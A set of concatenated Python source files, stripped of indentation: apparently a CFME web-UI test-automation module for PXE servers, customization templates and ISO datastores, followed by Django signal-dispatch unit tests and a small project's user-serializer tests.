entities = Table(locator='.//div[@id="records_div" or @id="main_div"]//table')
@property
def is_displayed(self):
return self.navigation.currently_selected == ['Compute', 'Infrastructure', 'PXE']
class PXEServersView(PXEMainView):
"""
represents whole All PXE Servers page
"""
@property
def is_displayed(self):
return (super(PXEServersView, self).is_displayed and
self.title.text == 'All PXE Servers')
class PXEDetailsToolBar(PXEToolBar):
"""
represents the toolbar which appears when any pxe entity is clicked
"""
reload = Button(title=VersionPick({Version.lowest(): 'Reload current display',
'5.9': 'Refresh this page'}))
class PXEServerDetailsView(PXEMainView):
"""
represents Server Details view
"""
toolbar = View.nested(PXEDetailsToolBar)
@View.nested
class entities(View): # noqa
basic_information = SummaryTable(title="Basic Information")
pxe_image_menus = SummaryTable(title='PXE Image Menus')
@property
def is_displayed(self):
return False
class PXEServerForm(View):
title = Text('//div[@id="main-content"]//h1')
# common fields
name = Input(id='name')
depot_type = BootstrapSelect(id='log_protocol')
access_url = Input(id='access_url')
pxe_dir = Input(id='pxe_directory')
windows_images_dir = Input(id='windows_images_directory')
customization_dir = Input(id='customization_directory')
filename = Input(id='pxemenu_0')
uri = Input(id='uri') # both NFS and Samba
# Samba only
username = Input(id='log_userid')
password = Input(id='log_password')
confirm_password = Input(id='log_verify')
validate = Button('Validate the credentials by logging into the Server')
@property
def is_displayed(self):
return False
class PXEServerAddView(PXEServerForm):
"""
represents Add New PXE Server view
"""
add = Button('Add')
cancel = Button('Cancel')
class PXEServerEditView(PXEServerForm):
"""
represents PXE Server Edit view
"""
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
class PXEImageEditView(View):
"""
it can be found when some image is clicked in PXE Server Tree
"""
title = Text('//div[@id="main-content"]//h1')
default_for_windows = Checkbox(id='default_for_windows')
type = BootstrapSelect(id='image_typ')
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
@property
def is_displayed(self):
return False
class PXEServer(Updateable, Pretty, Navigatable):
"""Model of a PXE Server object in CFME
Args:
name: Name of PXE server.
depot_type: Depot type, either Samba or Network File System.
uri: The Depot URI.
userid: The Samba username.
password: The Samba password.
access_url: HTTP access path for PXE server.
pxe_dir: The PXE dir for accessing configuration.
windows_dir: Windows source directory.
customize_dir: Customization directory for templates.
menu_filename: Menu filename for iPXE/syslinux menu.
"""
pretty_attrs = ['name', 'uri', 'access_url']
_param_name = ParamClassName('name')
def __init__(self, name=None, depot_type=None, uri=None, userid=None, password=None,
access_url=None, pxe_dir=None, windows_dir=None, customize_dir=None,
menu_filename=None, appliance=None):
Navigatable.__init__(self, appliance=appliance)
self.name = name
self.depot_type = depot_type
self.uri = uri
self.userid = userid
# todo: turn into Credentials class
self.password = password
self.access_url = access_url
self.pxe_dir = pxe_dir
self.windows_dir = windows_dir
self.customize_dir = customize_dir
self.menu_filename = menu_filename
def create(self, cancel=False, refresh=True, refresh_timeout=120):
"""
Creates a PXE server object
Args:
cancel (boolean): Whether to cancel out of the creation. The cancel is done
after all the information present in the PXE Server has been filled in the UI.
refresh (boolean): Whether to run the refresh operation on the PXE server after
the add has been completed.
"""
view = navigate_to(self, 'Add')
view.fill({'name': self.name,
'depot_type': self.depot_type,
'access_url': self.access_url,
'pxe_dir': self.pxe_dir,
'windows_images_dir': self.windows_dir,
'customization_dir': self.customize_dir,
'filename': self.menu_filename,
'uri': self.uri,
# Samba only
'username': self.userid,
'password': self.password,
'confirm_password': self.password})
if self.depot_type == 'Samba' and self.userid and self.password:
view.validate.click()
main_view = self.create_view(PXEServersView)
if cancel:
view.cancel.click()
main_view.flash.assert_success_message('Add of new PXE Server '
'was cancelled by the user')
else:
view.add.click()
main_view.flash.assert_no_error()
if refresh:
self.refresh(timeout=refresh_timeout)
@variable(alias="db")
def exists(self):
"""
Checks if the PXE server already exists
"""
dbs = self.appliance.db.client
candidates = list(dbs.session.query(dbs["pxe_servers"]))
return self.name in [s.name for s in candidates]
@exists.variant('ui')
def exists_ui(self):
"""
Checks if the PXE server already exists
"""
try:
navigate_to(self, 'Details')
return True
except NoSuchElementException:
return False
def update(self, updates, cancel=False):
"""
Updates a PXE server in the UI. Better to use utils.update.update context
manager than call this directly.
Args:
updates (dict): fields that are changing.
cancel (boolean): whether to cancel out of the update.
"""
view = navigate_to(self, 'Edit')
view.fill(updates)
if updates.get('userid') or updates.get('password'):
view.validate.click()
name = updates.get('name') or self.name
main_view = self.create_view(PXEServersView, override=updates)
if cancel:
view.cancel.click()
main_view.flash.assert_success_message('Edit of PXE Server "{}" was '
'cancelled by the user'.format(name))
else:
view.save.click()
main_view.flash.assert_no_error()
def delete(self, cancel=True):
"""
Deletes a PXE server from CFME
Args:
cancel: Whether to cancel the deletion, defaults to True
"""
view = navigate_to(self, 'Details')
view.toolbar.configuration.item_select(VersionPick({
Version.lowest(): 'Remove this PXE Server',
'5.9': 'Remove this PXE Server from Inventory'}).pick(self.appliance.version),
handle_alert=not cancel)
if not cancel:
main_view = self.create_view(PXEServersView)
main_view.flash.assert_no_error()
else:
navigate_to(self, 'Details')
def refresh(self, wait=True, timeout=120):
""" Refreshes the PXE relationships and waits for it to be updated
"""
view = navigate_to(self, 'Details')
last_time = view.entities.basic_information.get_text_of('Last Refreshed On')
view.toolbar.configuration.item_select('Refresh Relationships', handle_alert=True)
view.flash.assert_success_message('PXE Server "{}": Refresh Relationships '
'successfully initiated'.format(self.name))
if wait:
basic_info = view.entities.basic_information
wait_for(lambda lt: lt != basic_info.get_text_of('Last Refreshed On'),
func_args=[last_time], fail_func=view.toolbar.reload.click, num_sec=timeout,
message="pxe refresh")
@variable(alias='db')
def get_pxe_image_type(self, image_name):
pxe_i = self.appliance.db.client["pxe_images"]
pxe_s = self.appliance.db.client["pxe_servers"]
pxe_t = self.appliance.db.client["pxe_image_types"]
hosts = list(self.appliance.db.client.session.query(pxe_t.name)
.join(pxe_i, pxe_i.pxe_image_type_id == pxe_t.id)
.join(pxe_s, pxe_i.pxe_server_id == pxe_s.id)
.filter(pxe_s.name == self.name)
.filter(pxe_i.name == image_name))
if hosts:
return hosts[0][0]
else:
return None
@get_pxe_image_type.variant('ui')
def get_pxe_image_type_ui(self, image_name):
view = navigate_to(self, 'Details')
view.sidebar.servers.tree.click_path('All PXE Servers', self.name,
'PXE Images', image_name)
details_view = self.create_view(PXESystemImageTypeDetailsView)
return details_view.entities.basic_information.get_text_of('Type')
def set_pxe_image_type(self, image_name, image_type):
"""
Function to set the image type of a PXE image
"""
# todo: maybe create appropriate navmazing destinations instead ?
if self.get_pxe_image_type(image_name) != image_type:
view = navigate_to(self, 'Details')
view.sidebar.servers.tree.click_path('All PXE Servers', self.name,
'PXE Images', image_name)
details_view = self.create_view(PXESystemImageTypeDetailsView)
details_view.toolbar.configuration.item_select('Edit this PXE Image')
edit_view = self.create_view(PXEImageEditView)
edit_view.fill({'type': image_type})
edit_view.save.click()
@navigator.register(PXEServer, 'All')
class PXEServerAll(CFMENavigateStep):
VIEW = PXEServersView
prerequisite = NavigateToSibling('PXEMainPage')
def step(self):
self.view.sidebar.servers.tree.click_path('All PXE Servers')
@navigator.register(PXEServer, 'Add')
class PXEServerAdd(CFMENavigateStep):
VIEW = PXEServerAddView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Add a New PXE Server')
@navigator.register(PXEServer, 'Details')
class PXEServerDetails(CFMENavigateStep):
VIEW = PXEServerDetailsView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.sidebar.servers.tree.click_path('All PXE Servers', self.obj.name)
@navigator.register(PXEServer, 'Edit')
class PXEServerEdit(CFMENavigateStep):
VIEW = PXEServerEditView
prerequisite = NavigateToSibling('Details')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Edit this PXE Server')
class PXECustomizationTemplatesView(PXEMainView):
"""
represents Customization Template Groups page
"""
entities = Table(locator='.//div[@id="template_folders_div"]/table')
table = Table("//div[@id='main_div']//table")
@property
def is_displayed(self):
return (super(PXECustomizationTemplatesView, self).is_displayed and
self.title.text == 'All Customization Templates - System Image Types')
class PXECustomizationTemplateDetailsView(PXEMainView):
"""
represents some certain Customization Template Details page
"""
toolbar = View.nested(PXEDetailsToolBar)
@View.nested
class entities(View): # noqa
basic_information = SummaryTable(title="Basic Information")
script = ScriptBox(locator='//textarea[contains(@id, "script_data")]')
@property
def is_displayed(self):
if getattr(self.context['object'], 'name'):
title = 'Customization Template "{name}"'.format(self.context['object'].name)
return (super(PXECustomizationTemplateDetailsView, self).is_displayed and
self.entities.title.text == title)
else:
return False
class PXECustomizationTemplateForm(View):
title = Text('//div[@id="main-content"]//h1')
name = Input(id='name')
description = Input(id='description')
image_type = BootstrapSelect(id='img_typ')
type = BootstrapSelect(id='typ')
script = ScriptBox(locator='//textarea[contains(@id, "script_data")]')
@property
def is_displayed(self):
return False
class PXECustomizationTemplateAddView(PXECustomizationTemplateForm):
add = Button('Add')
cancel = Button('Cancel')
class PXECustomizationTemplateEditView(PXECustomizationTemplateForm):
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
class PXECustomizationTemplateCopyView(PXECustomizationTemplateForm):
toolbar = View.nested(PXEDetailsToolBar)
add = Button('Add')
cancel = Button('Cancel')
@attr.s
class CustomizationTemplate(Updateable, Pretty, BaseEntity):
"""
Model of a Customization Template in CFME
"""
pretty_attrs = ['name', 'image_type']
name = attr.ib(default=None)
description = attr.ib(default=None)
script_data = attr.ib(default=None)
image_type = attr.ib(default=None)
script_type = attr.ib(default=None)
@variable(alias='db')
def exists(self):
"""
Checks if the Customization template already exists
"""
dbs = self.appliance.db.client
candidates = list(dbs.session.query(dbs["customization_templates"]))
return self.name in [s.name for s in candidates]
@exists.variant('ui')
def exists_ui(self):
"""
Checks if the Customization template already exists
"""
try:
navigate_to(self, 'Details')
return True
except NoSuchElementException:
return False
def update(self, updates, cancel=False):
"""
Updates a Customization Template server in the UI. Better to use utils.update.update
context manager than call this directly.
Args:
updates (dict): fields that are changing.
cancel (boolean): whether to cancel out of the update.
"""
if 'image_type' in updates and updates['image_type'] is None:
updates['image_type'] = '<Choose>'
elif 'script_type' in updates and updates['script_type'] is None:
updates['script_type'] = '<Choose>'
view = navigate_to(self, 'Edit')
view.fill(updates)
main_view = self.create_view(PXECustomizationTemplatesView, override=updates)
if cancel:
view.cancel.click()
else:
view.save.click()
main_view.flash.assert_no_error()
def copy(self, name=None, description=None, cancel=False):
"""
This method is used to copy a Customization Template server via UI.
Args:
name (str): This field contains the name of the newly copied Customization Template.
description (str) : This field contains the description of the newly
copied Customization Template.
cancel (bool): It's used for flag to cancel or not the copy operation.
"""
view = navigate_to(self, 'Copy')
name = name or 'Copy of {}'.format(self.name)
description = description or 'Copy of {}'.format(self.description)
view.fill({'name': name, 'description': description})
customization_template = self.parent.instantiate(name, description, self.script_data,
self.image_type, self.script_type)
if cancel:
view.cancel.click()
else:
view.add.click()
main_view = self.create_view(PXECustomizationTemplatesView)
main_view.flash.assert_no_error()
return customization_template
@attr.s
class CustomizationTemplateCollection(BaseCollection):
"""Collection class for CustomizationTemplate"""
ENTITY = CustomizationTemplate
def create(self, name, description, image_type, script_type, script_data, cancel=False):
"""
Creates a Customization Template object
Args:
cancel (boolean): Whether to cancel out of the creation. The cancel is done
after all the information present in the CT has been filled in the UI.
name: Name of CT
description:description: The description field of CT.
image_type: Image type of the CT.
script_data: Contains the script data.
script_type: It specifies the script_type of the script.
"""
customization_templates = self.instantiate(name, description, script_data,
image_type, script_type)
view = navigate_to(self, 'Add')
view.fill({'name': name,
'description': description,
'image_type': image_type,
'type': script_type,
'script': script_data})
main_view = self.create_view(PXECustomizationTemplatesView)
if cancel:
view.cancel.click()
else:
view.add.click()
main_view.flash.assert_no_error()
return customization_templates
def delete(self, cancel=False, *ct_objs):
"""
Deletes a Customization Template server from CFME
Args:
ct_objs: It's a Customization Template object
cancel: Whether to cancel the deletion, defaults to True
"""
for ct_obj in ct_objs:
view = navigate_to(ct_obj, 'Details')
view.toolbar.configuration.item_select('Remove this Customization Template',
handle_alert=not cancel)
view = ct_obj.create_view(PXECustomizationTemplatesView)
view.flash.assert_no_error()
@navigator.register(CustomizationTemplateCollection, 'All')
class CustomizationTemplateAll(CFMENavigateStep):
VIEW = PXECustomizationTemplatesView
prerequisite = NavigateToSibling('PXEMainPage')
def step(self):
self.view.sidebar.templates.tree.click_path(('All Customization Templates - '
'System Image Types'))
@navigator.register(CustomizationTemplateCollection, 'Add')
class CustomizationTemplateAdd(CFMENavigateStep):
VIEW = PXECustomizationTemplateAddView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Add a New Customization Template')
@navigator.register(CustomizationTemplate, 'Details')
class CustomizationTemplateDetails(CFMENavigateStep):
VIEW = PXECustomizationTemplateDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self):
tree = self.view.sidebar.templates.tree
tree.click_path('All Customization Templates - System Image Types', self.obj.image_type,
self.obj.name)
@navigator.register(CustomizationTemplate, 'Copy')
class CustomizationTemplateCopy(CFMENavigateStep):
VIEW = PXECustomizationTemplateCopyView
prerequisite = NavigateToSibling('Details')
def step(self):
self.view.toolbar.configuration.item_select("Copy this Customization Template")
@navigator.register(CustomizationTemplate, 'Edit')
class CustomizationTemplateEdit(CFMENavigateStep):
VIEW = PXECustomizationTemplateEditView
prerequisite = NavigateToSibling('Details')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Edit this Customization Template')
class PXESystemImageTypesView(PXEMainView):
"""
represents whole All System Image Types page
"""
@property
def is_displayed(self):
return (super(PXESystemImageTypesView, self).is_displayed and
self.title.text == 'All System Image Types')
class PXESystemImageTypeDetailsView(PXEMainView):
toolbar = View.nested(PXEDetailsToolBar)
@View.nested
class entities(View): # noqa
basic_information = SummaryTable(title="Basic Information")
@property
def is_displayed(self):
return False
class PXESystemImageTypeForm(View):
title = Text('//div[@id="main-content"]//h1')
name = Input(id='name')
type = BootstrapSelect(id='provision_type')
@property
def is_displayed(self):
return False
class PXESystemImageTypeAddView(PXESystemImageTypeForm):
add = Button('Add')
cancel = Button('Cancel')
class PXESystemImageTypeEditView(PXESystemImageTypeForm):
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
@attr.s
class SystemImageType(Updateable, Pretty, BaseEntity):
"""Model of a System Image Type in CFME.
Args:
name: The name of the System Image Type.
provision_type: The provision type, either Vm or Host.
"""
pretty_attrs = ['name', 'provision_type']
VM_OR_INSTANCE = "VM and Instance"
HOST_OR_NODE = "Host / Node"
name = attr.ib(default=None)
provision_type = attr.ib(default=None)
def update(self, updates, cancel=False):
"""
Updates a System Image Type in the UI. Better to use utils.update.update context
manager than call this directly.
Args:
updates (dict): fields that are changing.
cancel (boolean): whether to cancel out of the update.
"""
view = navigate_to(self, 'Edit')
view.fill({'name': updates.get('name'), 'type': updates.get('provision_type')})
if cancel:
view.cancel.click()
else:
view.save.click()
# No flash message
def delete(self, cancel=True):
"""
Deletes a System Image Type from CFME
Args:
cancel: Whether to cancel the deletion, defaults to True
"""
view = navigate_to(self, 'Details')
view.toolbar.configuration.item_select('Remove this System Image Type',
handle_alert=not cancel)
if not cancel:
main_view = self.create_view(PXESystemImageTypesView)
msg = 'System Image Type "{}": Delete successful'.format(self.name)
main_view.flash.assert_success_message(msg)
else:
navigate_to(self, 'Details')
@attr.s
class SystemImageTypeCollection(BaseCollection):
""" Collection class for SystemImageType. """
ENTITY = SystemImageType
def create(self, name, provision_type, cancel=False):
"""
Creates a System Image Type object
Args:
name: It contains name of the System Image Type
provision_type: Type on Image. i.e Vm and Instance or Host
cancel (boolean): Whether to cancel out of the creation. The cancel is done
after all the information present in the SIT has been filled in the UI.
"""
system_image_type = self.instantiate(name, provision_type)
view = navigate_to(self, 'Add')
view.fill({'name': name, 'type': provision_type})
if cancel:
view.cancel.click()
msg = 'Add of new System Image Type was cancelled by the user'
else:
view.add.click()
msg = 'System Image Type "{}" was added'.format(name)
main_view = self.create_view(PXESystemImageTypesView)
main_view.flash.assert_success_message(msg)
return system_image_type
def delete(self, cancel=False, *sys_objs):
"""
This methods deletes the System Image Type using select option,
hence can be used for multiple delete.
Args:
cancel: This is the boolean argument required for handle_alert
sys_objs: It's System Image Types object
"""
view = navigate_to(self, 'All')
for sys_obj in sys_objs:
view.entities.row(Name=sys_obj.name)[0].click()
view.toolbar.configuration.item_select("Remove System Image Types", handle_alert=not cancel)
main_view = self.create_view(PXESystemImageTypesView)
main_view.flash.assert_no_error()
@navigator.register(SystemImageTypeCollection, 'All')
class SystemImageTypeAll(CFMENavigateStep):
VIEW = PXESystemImageTypesView
prerequisite = NavigateToSibling('PXEMainPage')
def step(self):
self.view.sidebar.image_types.tree.click_path('All System Image Types')
@navigator.register(SystemImageTypeCollection, 'Add')
class SystemImageTypeAdd(CFMENavigateStep):
VIEW = PXESystemImageTypeAddView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Add a new System Image Type')
@navigator.register(SystemImageType, 'Details')
class SystemImageTypeDetails(CFMENavigateStep):
VIEW = PXESystemImageTypeDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self):
self.prerequisite_view.sidebar.image_types.tree.click_path('All System Image Types',
self.obj.name)
@navigator.register(SystemImageType, 'Edit')
class SystemImageTypeEdit(CFMENavigateStep):
VIEW = PXESystemImageTypeEditView
prerequisite = NavigateToSibling('Details')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Edit this System Image Type')
class PXEDatastoresView(PXEMainView):
"""
represents whole All ISO Datastores page
"""
@property
def is_displayed(self):
return (super(PXEDatastoresView, self).is_displayed and
self.title.text == 'All ISO Datastores')
class PXEDatastoreDetailsView(PXEMainView):
toolbar = View.nested(PXEDetailsToolBar)
@View.nested
class entities(View): # noqa
basic_information = SummaryTable(title="Basic Information")
@property
def is_displayed(self):
return False
class PXEDatastoreForm(View):
title = Text('//div[@id="main-content"]//h1')
provider = BootstrapSelect(id='ems_id')
@property
def is_displayed(self):
return False
class PXEDatastoreAddView(PXEDatastoreForm):
add = Button('Add')
cancel = Button('Cancel')
class PXEDatastoreEditView(PXEDatastoreForm):
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
class ISODatastore(Updateable, Pretty, Navigatable):
"""Model of a PXE Server object in CFME
Args:
provider: Provider name.
"""
_param_name = ParamClassName('ds_name')
pretty_attrs = ['provider']
def __init__(self, provider=None, appliance=None):
Navigatable.__init__(self, appliance=appliance)
self.provider = provider
def create(self, cancel=False, refresh=True, refresh_timeout=120):
"""
Creates an ISO datastore object
Args:
cancel (boolean): Whether to cancel out of the creation. The cancel is done
after all the information present in the ISO datastore has been filled in the UI.
refresh (boolean): Whether to run the refresh operation on the ISO datastore after
the add has been completed.
"""
view = navigate_to(self, 'Add')
view.fill({'provider': self.provider})
main_view = self.create_view(PXEDatastoresView)
if cancel:
view.cancel.click()
msg = 'Add of new ISO Datastore was cancelled by the user'
else:
view.add.click()
msg = 'ISO Datastore "{}" was added'.format(self.provider)
main_view.flash.assert_success_message(msg)
if refresh:
self.refresh(timeout=refresh_timeout)
@variable(alias='db')
def exists(self):
"""
Checks if the ISO Datastore already exists via db
"""
iso = self.appliance.db.client['iso_datastores']
ems = self.appliance.db.client['ext_management_systems']
name = self.provider
iso_ds = list(self.appliance.db.client.session.query(iso.id)
.join(ems, iso.ems_id == ems.id)
.filter(ems.name == name))
if iso_ds:
return True
else:
return False
@exists.variant('ui')
def exists_ui(self):
"""
Checks if the ISO Datastore already exists via UI
"""
try:
navigate_to(self, 'Details')
return True
except NoSuchElementException:
return False
def delete(self, cancel=True):
"""
Deletes an ISO Datastore from CFME
Args:
cancel: Whether to cancel the deletion, defaults to True
"""
view = navigate_to(self, 'Details')
msg = 'Remove this ISO Datastore'
if self.appliance.version >= '5.9':
msg = 'Remove this ISO Datastore from Inventory'
view.toolbar.configuration.item_select(msg, handle_alert=not cancel)
if not cancel:
main_view = self.create_view(PXEDatastoresView)
msg = 'ISO Datastore "{}": Delete successful'.format(self.provider)
main_view.flash.assert_success_message(msg)
else:
navigate_to(self, 'Details')
def refresh(self, wait=True, timeout=120):
""" Refreshes the PXE relationships and waits for it to be updated
"""
view = navigate_to(self, 'Details')
basic_info = view.entities.basic_information
last_time = basic_info.get_text_of('Last Refreshed On')
view.toolbar.configuration.item_select('Refresh Relationships', handle_alert=True)
view.flash.assert_success_message(('ISO Datastore "{}": Refresh Relationships successfully '
'initiated'.format(self.provider)))
if wait:
wait_for(lambda lt: lt != basic_info.get_text_of('Last Refreshed On'),
func_args=[last_time], fail_func=view.toolbar.reload.click, num_sec=timeout,
message="iso refresh")
def set_iso_image_type(self, image_name, image_type):
"""
Function to set the image type of a PXE image
"""
view = navigate_to(self, 'All')
view.sidebar.datastores.tree.click_path('All ISO Datastores', self.provider,
'ISO Images', image_name)
view.toolbar.configuration.item_select('Edit this ISO Image')
view.fill({'image_type': image_type})
# Click save if enabled else click Cancel
if view.save.active:
view.save.click()
else:
view.cancel.click()
@navigator.register(ISODatastore, 'All')
class ISODatastoreAll(CFMENavigateStep):
VIEW = PXEDatastoresView
prerequisite = NavigateToSibling('PXEMainPage')
def step(self):
self.view.sidebar.datastores.tree.click_path("All ISO Datastores")
@navigator.register(ISODatastore, 'Add')
class ISODatastoreAdd(CFMENavigateStep):
VIEW = PXEDatastoreAddView
prerequisite = NavigateToSibling('All')
def step(self):
self.prerequisite_view.toolbar.configuration.item_select('Add a New ISO Datastore')
@navigator.register(ISODatastore, 'Details')
class ISODatastoreDetails(CFMENavigateStep):
VIEW = PXEDatastoreDetailsView
prerequisite = NavigateToSibling('All')
def step(self):
self.view.sidebar.datastores.tree.click_path("All ISO Datastores", self.obj.provider)
@navigator.register(PXEServer, 'PXEMainPage')
@navigator.register(CustomizationTemplateCollection, 'PXEMainPage')
@navigator.register(SystemImageTypeCollection, 'PXEMainPage')
@navigator.register(ISODatastore, 'PXEMainPage')
class PXEMainPage(CFMENavigateStep):
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self):
self.prerequisite_view.navigation.select('Compute', 'Infrastructure', 'PXE')
def get_template_from_config(template_config_name, create=False, appliance=None):
"""
Convenience function to grab the details for a template from the yamls and create template.
"""
assert appliance is not None
template_config = conf.cfme_data.get('customization_templates', {})[template_config_name]
script_data = load_data_file(str(project_path.join(template_config['script_file'])),
replacements=template_config['replacements'])
script_data = script_data.read()
collection = appliance.collections.customization_templates
kwargs = {
'name': template_config['name'],
'description': template_config['description'],
'image_type': template_config['image_type'],
'script_type': template_config['script_type'],
'script_data': script_data
}
customization_template = collection.instantiate(**kwargs)
if create and not customization_template.exists():
return collection.create(**kwargs)
return customization_template
def get_pxe_server_from_config(pxe_config_name, appliance):
"""
Convenience function to grab the details for a pxe server fomr the yamls.
"""
pxe_config = conf.cfme_data.get('pxe_servers', {})[pxe_config_name]
return PXEServer(name=pxe_config['name'],
depot_type=pxe_config['depot_type'],
uri=pxe_config['uri'],
userid=pxe_config.get('userid') or None,
password=pxe_config.get('password') or None,
access_url=pxe_config['access_url'],
pxe_dir=pxe_config['pxe_dir'],
windows_dir=pxe_config['windows_dir'],
customize_dir=pxe_config['customize_dir'],
menu_filename=pxe_config['menu_filename'],
appliance=appliance)
def remove_all_pxe_servers():
"""
Convenience function to remove all PXE servers
"""
view = navigate_to(PXEServer, 'All')
if view.entities.is_displayed:
for entity in view.entities.rows():
entity[0].check()
view.toolbar.configuration.item_select('Remove PXE Servers', handle_alert=True)
| gpl-2.0 |
sdcooke/django | tests/dispatch/tests.py | 346 | 6627 | import gc
import sys
import time
import unittest
import weakref
from types import TracebackType
from django.dispatch import Signal, receiver
if sys.platform.startswith('java'):
def garbage_collect():
# Some JVM GCs will execute finalizers in a different thread, meaning
# we need to wait for that to complete before we go on looking for the
# effects of that.
gc.collect()
time.sleep(0.1)
elif hasattr(sys, "pypy_version_info"):
def garbage_collect():
# Collecting weakreferences can take two collections on PyPy.
gc.collect()
gc.collect()
else:
def garbage_collect():
gc.collect()
def receiver_1_arg(val, **kwargs):
return val
class Callable(object):
def __call__(self, val, **kwargs):
return val
def a(self, val, **kwargs):
return val
a_signal = Signal(providing_args=["val"])
b_signal = Signal(providing_args=["val"])
c_signal = Signal(providing_args=["val"])
d_signal = Signal(providing_args=["val"], use_caching=True)
class DispatcherTests(unittest.TestCase):
"""Test suite for dispatcher (barely started)"""
def assertTestIsClean(self, signal):
"""Assert that everything has been cleaned up automatically"""
# Note that dead weakref cleanup happens as side effect of using
# the signal's receivers through the signals API. So, first do a
# call to an API method to force cleanup.
self.assertFalse(signal.has_listeners())
self.assertEqual(signal.receivers, [])
def test_exact(self):
a_signal.connect(receiver_1_arg, sender=self)
expected = [(receiver_1_arg, "test")]
result = a_signal.send(sender=self, val="test")
self.assertEqual(result, expected)
a_signal.disconnect(receiver_1_arg, sender=self)
self.assertTestIsClean(a_signal)
def test_ignored_sender(self):
a_signal.connect(receiver_1_arg)
expected = [(receiver_1_arg, "test")]
result = a_signal.send(sender=self, val="test")
self.assertEqual(result, expected)
a_signal.disconnect(receiver_1_arg)
self.assertTestIsClean(a_signal)
def test_garbage_collected(self):
a = Callable()
a_signal.connect(a.a, sender=self)
expected = []
del a
garbage_collect()
result = a_signal.send(sender=self, val="test")
self.assertEqual(result, expected)
self.assertTestIsClean(a_signal)
def test_cached_garbaged_collected(self):
"""
Make sure signal caching sender receivers don't prevent garbage
collection of senders.
"""
class sender:
pass
wref = weakref.ref(sender)
d_signal.connect(receiver_1_arg)
d_signal.send(sender, val='garbage')
del sender
garbage_collect()
try:
self.assertIsNone(wref())
finally:
# Disconnect after reference check since it flushes the tested cache.
d_signal.disconnect(receiver_1_arg)
def test_multiple_registration(self):
a = Callable()
a_signal.connect(a)
a_signal.connect(a)
a_signal.connect(a)
a_signal.connect(a)
a_signal.connect(a)
a_signal.connect(a)
result = a_signal.send(sender=self, val="test")
self.assertEqual(len(result), 1)
self.assertEqual(len(a_signal.receivers), 1)
del a
del result
garbage_collect()
self.assertTestIsClean(a_signal)
def test_uid_registration(self):
def uid_based_receiver_1(**kwargs):
pass
def uid_based_receiver_2(**kwargs):
pass
a_signal.connect(uid_based_receiver_1, dispatch_uid="uid")
a_signal.connect(uid_based_receiver_2, dispatch_uid="uid")
self.assertEqual(len(a_signal.receivers), 1)
a_signal.disconnect(dispatch_uid="uid")
self.assertTestIsClean(a_signal)
def test_robust(self):
"""Test the send_robust() function"""
def fails(val, **kwargs):
raise ValueError('this')
a_signal.connect(fails)
result = a_signal.send_robust(sender=self, val="test")
err = result[0][1]
self.assertIsInstance(err, ValueError)
self.assertEqual(err.args, ('this',))
self.assertTrue(hasattr(err, '__traceback__'))
self.assertIsInstance(err.__traceback__, TracebackType)
a_signal.disconnect(fails)
self.assertTestIsClean(a_signal)
def test_disconnection(self):
receiver_1 = Callable()
receiver_2 = Callable()
receiver_3 = Callable()
a_signal.connect(receiver_1)
a_signal.connect(receiver_2)
a_signal.connect(receiver_3)
a_signal.disconnect(receiver_1)
del receiver_2
garbage_collect()
a_signal.disconnect(receiver_3)
self.assertTestIsClean(a_signal)
def test_values_returned_by_disconnection(self):
receiver_1 = Callable()
receiver_2 = Callable()
a_signal.connect(receiver_1)
receiver_1_disconnected = a_signal.disconnect(receiver_1)
receiver_2_disconnected = a_signal.disconnect(receiver_2)
self.assertTrue(receiver_1_disconnected)
self.assertFalse(receiver_2_disconnected)
self.assertTestIsClean(a_signal)
def test_has_listeners(self):
self.assertFalse(a_signal.has_listeners())
self.assertFalse(a_signal.has_listeners(sender=object()))
receiver_1 = Callable()
a_signal.connect(receiver_1)
self.assertTrue(a_signal.has_listeners())
self.assertTrue(a_signal.has_listeners(sender=object()))
a_signal.disconnect(receiver_1)
self.assertFalse(a_signal.has_listeners())
self.assertFalse(a_signal.has_listeners(sender=object()))
class ReceiverTestCase(unittest.TestCase):
"""
Test suite for receiver.
"""
def test_receiver_single_signal(self):
@receiver(a_signal)
def f(val, **kwargs):
self.state = val
self.state = False
a_signal.send(sender=self, val=True)
self.assertTrue(self.state)
def test_receiver_signal_list(self):
@receiver([a_signal, b_signal, c_signal])
def f(val, **kwargs):
self.state.append(val)
self.state = []
a_signal.send(sender=self, val='a')
c_signal.send(sender=self, val='c')
b_signal.send(sender=self, val='b')
self.assertIn('a', self.state)
self.assertIn('b', self.state)
self.assertIn('c', self.state)
| bsd-3-clause |
floatec/ProsDataBase | ProsDataBase/database/tests/usertest.py | 1 | 4552 | from django.test import TestCase
from ..models import *
from django.test.client import Client
from ..tests.factory import *
from ..views.api import *
class UserTest(TestCase):
def test_serializeAll(self):
listofuser = list()
listofuser2 = list()
for i in range(1,101):
listofuser.append(UserFactory.createRandomUser())
listofuser2.append(UserFactory.createRandomUser())
result = UserSerializer.serializeAll()
# ===================================================
# tests the count of the users
# ===================================================
length = 0
for user in result["users"]:
length += 1
self.assertEquals(length, 200)
# ===================================================
# test the users are in the result
# ===================================================
for user in listofuser:
self.assertTrue(user.username in result["users"])
for user in listofuser2:
self.assertTrue(user.username in result["users"])
# Jetzt passts
def test_serializeOne(self):
user1 = UserFactory.createRandomUser()
user2 = UserFactory.createRandomUser()
user2.tableCreator=True
user2.admin=True
user2.userManager=True
user2.is_active = False
result = UserSerializer.serializeOne(user1.username)
result2 = UserSerializer.serializeOne(user2.username)
print result
print result2
# ===================================================
# test the user have the same name in the result
# ===================================================
self.assertTrue(user1.username in result["name"])
self.assertTrue(user1.is_active)
self.assertTrue(user1.tableCreator)
self.assertFalse(user1.admin)
self.assertFalse(user1.userManager)
self.assertTrue(user2.username in result2["name"])
self.assertFalse(user2.is_active)
self.assertTrue(user2.tableCreator)
